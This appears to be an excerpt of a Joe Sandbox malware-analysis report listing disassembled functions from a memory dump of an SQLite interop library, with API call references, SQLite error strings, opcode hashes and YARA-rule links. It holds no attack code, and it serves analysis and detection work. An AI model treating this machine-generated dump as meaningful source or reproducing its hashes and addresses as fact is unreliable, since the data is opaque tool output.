                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.___swprintf_l
                                                                                      • String ID: A$recursively defined fts5 content table
                                                                                      • API String ID: 3842319322-656091511
                                                                                      • Opcode ID: ee9b2f00a0e991099b34d3a88c48cc4feadf9e6f9a01c6cd1326733e0bcce811
                                                                                      • Instruction ID: 05f06e94de2a4032144b901a7cde52ff8ac62e41990ebd3ad8abb9a944d85c6a
                                                                                      • Opcode Fuzzy Hash: ee9b2f00a0e991099b34d3a88c48cc4feadf9e6f9a01c6cd1326733e0bcce811
                                                                                      • Instruction Fuzzy Hash: 19E171716093418FD704CF19D480B5ABBF5FF8A318F144AAEE8989B641D772D886CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C488620 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 356COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(?), ref: 6C4886D7
                                                                                      • SI4abff63f9a080046.SQLITE.INTEROP(?), ref: 6C4886E5
                                                                                      • SIf356c1132676af25.SQLITE.INTEROP(?), ref: 6C488755
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C4889BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I4abff63f9a080046.I943321d364f02e5d.Iea8388f7613ed158.If356c1132676af25.
                                                                                      • String ID: string or blob too big
                                                                                      • API String ID: 3699110837-2803948771
                                                                                      • Opcode ID: 82fe663093a6103871686c68c0fae90eb331b8ad3d0fbc795eeb6ddfbb39c011
                                                                                      • Instruction ID: f95a1b390e009047c4c642ce38046d121d4e546e7e6b69a059834153f03d7702
                                                                                      • Opcode Fuzzy Hash: 82fe663093a6103871686c68c0fae90eb331b8ad3d0fbc795eeb6ddfbb39c011
                                                                                      • Instruction Fuzzy Hash: A3C1E771A077418BD705CE29C880F56B7E2AFC6329F684B5EE8A4477A1E730C846C782
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C6A50 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 297COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113EA,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,-00000001,?,?,?,?,?,6C4C60F4,?,00000000), ref: 6C4C6A94
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000113F9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,-00000001,?,?,?,?,?,6C4C60F4,?,00000000), ref: 6C4C6AE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: cb04aaf7733b87e9657c729d547d4bc89f5ccc4529b2f714fdc8888e99e24ef7
                                                                                      • Instruction ID: 25dfd98456d11d4827d30e84c0b60cda5e8ff9ed5ecff1c40ce8306a440ebd0f
                                                                                      • Opcode Fuzzy Hash: cb04aaf7733b87e9657c729d547d4bc89f5ccc4529b2f714fdc8888e99e24ef7
                                                                                      • Instruction Fuzzy Hash: 1EB16D757083118FC704CF29D880EAAB7E5EBC8319F048A6DE958D7751E731E906CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448DB0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 290COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028CF7,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000,6C5028BC,6C449309), ref: 6C448DDB
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C448DD4
                                                                                      • misuse, xrefs: 6C448DCF
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C448DC5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 98668194a269b9700dafc25b7e62c97471171905d91ec3a3e8d4bfdc52938f75
                                                                                      • Instruction ID: 12cf788ca172a38349db7fb2c389b78b6d35bb0da59a83691da545df3e7eb869
                                                                                      • Opcode Fuzzy Hash: 98668194a269b9700dafc25b7e62c97471171905d91ec3a3e8d4bfdc52938f75
                                                                                      • Instruction Fuzzy Hash: 1CA1C836B052888B9B04CF2DED058A873F4E7DB226B0583ABFD1CC7B01E77195949795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EEC80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C3EECEA
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,000000FF,00000000), ref: 6C3EED1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9196a02c851acbfb.I943321d364f02e5d.
                                                                                      • String ID: string or blob too big
                                                                                      • API String ID: 3685610376-2803948771
                                                                                      • Opcode ID: 6e194217898d2c40b955b421ea0017605f730e3b6b2e7d9cc4e64f6920c5665f
                                                                                      • Instruction ID: 6f52f6cadec81ce91066525f53c9cf597843c5ae59388e9cb8668e85b9fff995
                                                                                      • Opcode Fuzzy Hash: 6e194217898d2c40b955b421ea0017605f730e3b6b2e7d9cc4e64f6920c5665f
                                                                                      • Instruction Fuzzy Hash: 7B51B2357046209FDB24DE19D840D66B3B5EB8D338B24866EE859C7B90EB32E8158BD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C410160 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C4102C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: string or blob too big
                                                                                      • API String ID: 223094752-2803948771
                                                                                      • Opcode ID: 57b300fd591a5ddd1db8280fb629fe82dcf614eb60703d645bb1f4af9bcf3ded
                                                                                      • Instruction ID: 86c4a740dbbda1d9a696f611d1976a6d590ae97fee99189c1c323db744845bb8
                                                                                      • Opcode Fuzzy Hash: 57b300fd591a5ddd1db8280fb629fe82dcf614eb60703d645bb1f4af9bcf3ded
                                                                                      • Instruction Fuzzy Hash: 95412A3270C2914BD700CA589C80FB9B3959B4533AF24477DECA987F82EA3688658391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C66C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 166COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?), ref: 6C4C678D
                                                                                        • Part of subcall function 6C4C98F0: SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010983,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?), ref: 6C4C991F
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4C6867
                                                                                      • database corruption, xrefs: 6C4C6862
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4C6858
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.Ifc350ae509dc2b53.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 3237531572-2363313300
                                                                                      • Opcode ID: 280f0a4ea428b6848eaf34627df8f556ad792b7c7913e8fc05d24e349e4c1b7d
                                                                                      • Instruction ID: 19ae6bb513542302513a8a243aab506ce85db64ed5f72acc78d7b026340c44ed
                                                                                      • Opcode Fuzzy Hash: 280f0a4ea428b6848eaf34627df8f556ad792b7c7913e8fc05d24e349e4c1b7d
                                                                                      • Instruction Fuzzy Hash: 8B5115397057408FD321CF28D440FA6BBE1EF45319F1489AED9998BB62D366E841C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C494C10 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: cannot detach database %s$database %s is locked$main$no such database: %s
                                                                                      • API String ID: 48624451-3838832555
                                                                                      • Opcode ID: 1fec5d7c070551b45b86902839e293190b12a8daf14f807266c6092fab4b51ed
                                                                                      • Instruction ID: 857586a8c1a4f945f6cc798e60b3d9a2f68300ce8aef44871457d0c6486942f2
                                                                                      • Opcode Fuzzy Hash: 1fec5d7c070551b45b86902839e293190b12a8daf14f807266c6092fab4b51ed
                                                                                      • Instruction Fuzzy Hash: DB5100313082228FD704CF19C480E6ABBE1AF85399F154A9DE8748FB91D731D846CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446330 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 149COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000295D3,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000001), ref: 6C446370
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446369
                                                                                      • unable to delete/modify collation sequence due to active statements, xrefs: 6C4463D6
                                                                                      • misuse, xrefs: 6C446364
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C44635A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse$unable to delete/modify collation sequence due to active statements
                                                                                      • API String ID: 1952225102-1643035561
                                                                                      • Opcode ID: 2f93eb11d5859b82af1d3f9ddcc79d75792585f201edaebff31a1e991aac513e
                                                                                      • Instruction ID: 56791f146967f7a802c1f96074a522a5041951b1694e41f32a76467bc1574ee6
                                                                                      • Opcode Fuzzy Hash: 2f93eb11d5859b82af1d3f9ddcc79d75792585f201edaebff31a1e991aac513e
                                                                                      • Instruction Fuzzy Hash: 2041F6716007519BEB04DF19D850FEAB7A1EB8031EF24856DE858CBB81D732E80ACBD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F81E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(no such function: %s,?,?,?,00000000), ref: 6C3F8317
                                                                                        • Part of subcall function 6C477A30: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00020832,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C40EF31,?,00000080,00000000,?,?), ref: 6C477B29
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,00000000), ref: 6C3F8253
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C3F8263
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I1c7a7970970b9619.I9c6d7cd7b7d38055.Ifc350ae509dc2b53.
                                                                                      • String ID: SELECT %s$no such function: %s
                                                                                      • API String ID: 1349180417-3089863949
                                                                                      • Opcode ID: f9bb00716ca4bbdc9144c5ee5801b2b8f5dab6d7a03b1e7411d7735cfd886185
                                                                                      • Instruction ID: 25f56839efacce345fe524c76377e6f2c33d127773bca76c8bedf04d2f3e0e66
                                                                                      • Opcode Fuzzy Hash: f9bb00716ca4bbdc9144c5ee5801b2b8f5dab6d7a03b1e7411d7735cfd886185
                                                                                      • Instruction Fuzzy Hash: B541B571B00705ABD710CFAA9880A9FF7F9EF8521CF10097ED959A7B01D771E9058BA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C434F20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1ae480d1861ed022.SQLITE.INTEROP(?,?,?), ref: 6C434F9F
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%s_segments,?), ref: 6C434FBA
                                                                                      • SI327cfc7a6b1fd1fb.SQLITE.INTEROP(?,?,00000000,block,?,?,00000000,?), ref: 6C434FEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1ae480d1861ed022.I1c7a7970970b9619.I327cfc7a6b1fd1fb.
                                                                                      • String ID: %s_segments$block
                                                                                      • API String ID: 2640728855-4076095781
                                                                                      • Opcode ID: 55649f369efc04aa973312431b016f3deb8e1b0a478d1d9e2c95f7d516fa9679
                                                                                      • Instruction ID: 4ee28a0b81cd2aa3d54898296770190503dbf45eaac04e07ec9aaa3eeb31815d
                                                                                      • Opcode Fuzzy Hash: 55649f369efc04aa973312431b016f3deb8e1b0a478d1d9e2c95f7d516fa9679
                                                                                      • Instruction Fuzzy Hash: 075170716042168FDB04CF1AD880F96B7F4FB88314F1955B9E85C9BA15E331E945CBE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41DCC0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028E96,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C41DD8E
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028E96,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C41DE05
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: d3a8304e95032dafb22675287acaa66f35ea244dab5732049765bae2d9671dcd
                                                                                      • Instruction ID: 4a9eb2c618c220fb08ca7a5ad3f18cc428971ce06cda47c83cc8e9bd3e51ef2f
                                                                                      • Opcode Fuzzy Hash: d3a8304e95032dafb22675287acaa66f35ea244dab5732049765bae2d9671dcd
                                                                                      • Instruction Fuzzy Hash: 934100B2604341ABDB10DF699C86EA3B7A4BF4431AF040929ED58CBF41E731E4148BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C488480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%.*f,00000000), ref: 6C4885C4
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C4885D5
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,00000000,00000001), ref: 6C4885F9
                                                                                      • SI24bb313f312e2857.SQLITE.INTEROP(?), ref: 6C488612
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I24bb313f312e2857.I943321d364f02e5d.Ifc350ae509dc2b53.
                                                                                      • String ID: %.*f
                                                                                      • API String ID: 893470004-1338106815
                                                                                      • Opcode ID: d9abada1dea65cd7d2046d0a62b5f4a15d20b2ecb0e5c2fef441825c61c8f61c
                                                                                      • Instruction ID: c008ac938a3f870d46be4292d769931ea0d64e4942a00f62f143b453d4b22dcf
                                                                                      • Opcode Fuzzy Hash: d9abada1dea65cd7d2046d0a62b5f4a15d20b2ecb0e5c2fef441825c61c8f61c
                                                                                      • Instruction Fuzzy Hash: B7415732907A1486C712EA38C841E9673A0AF573AEB15474FFC557EA51EB31E88387D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EE5B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(6C3EDF06,?,6C3EDF06), ref: 6C3EE631
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP ref: 6C3EE661
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,6C3EE0CC,?,?,?,6C3EDF06), ref: 6C3EE6BD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Iea8388f7613ed158.$Ifc350ae509dc2b53.
                                                                                      • String ID: JSON cannot hold BLOB values$null
                                                                                      • API String ID: 3517192386-1864232943
                                                                                      • Opcode ID: 8eb6c7a84e49d382a3f0031c6b4a7611c64f2143ea6db6b5277a40c5f9488163
                                                                                      • Instruction ID: d443b8a43edcda946ee0d2afb1b7b60a1c2b28e03b08a59a72f78a01ff20bd4d
                                                                                      • Opcode Fuzzy Hash: 8eb6c7a84e49d382a3f0031c6b4a7611c64f2143ea6db6b5277a40c5f9488163
                                                                                      • Instruction Fuzzy Hash: 6E3129B16007104BD730DF19E844B67B3E1AB4932CF14462ED86A86B81E776E959CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EAFE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI943321d364f02e5d.SQLITE.INTEROP(?), ref: 6C3EB082
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,00000001,6C4E1A20,?,?,?,?,?,?), ref: 6C3EB0BB
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,?,00000001,000000FF,?,?,?,?), ref: 6C3EB0D2
                                                                                      Strings
                                                                                      Memory Dump Source
